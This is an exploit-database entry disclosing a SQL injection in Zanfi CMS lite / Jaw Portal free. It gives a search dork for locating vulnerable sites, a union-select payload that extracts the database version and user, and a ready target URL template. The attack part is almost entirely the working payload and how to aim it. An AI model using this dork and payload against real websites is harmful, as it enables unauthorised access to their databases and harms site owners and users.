id: 3640
date: 09/09/2008
title: Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability
author: Cru3l.b0y
cves: 

===================================================================
Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability
===================================================================



#####################################################
APPLICATION : Zanfi CMS lite / Jaw Portal free
DOWNLOAD    : http://www.zanfi.nl/down.php?file=ZanfiCmsLite.rar
VENDOR      : http://www.zanfi.nl/
Dork        : Powered by: Zanfi Solutions
#####################################################


[+] SQL     : DBpAGE&pageid=-1'+union+select+version(),user()/*
[+] Exploit : http://[t4rg3t]/[p4th]/index.php?page=[SQL]




#  0day.today [2023-03-27]  #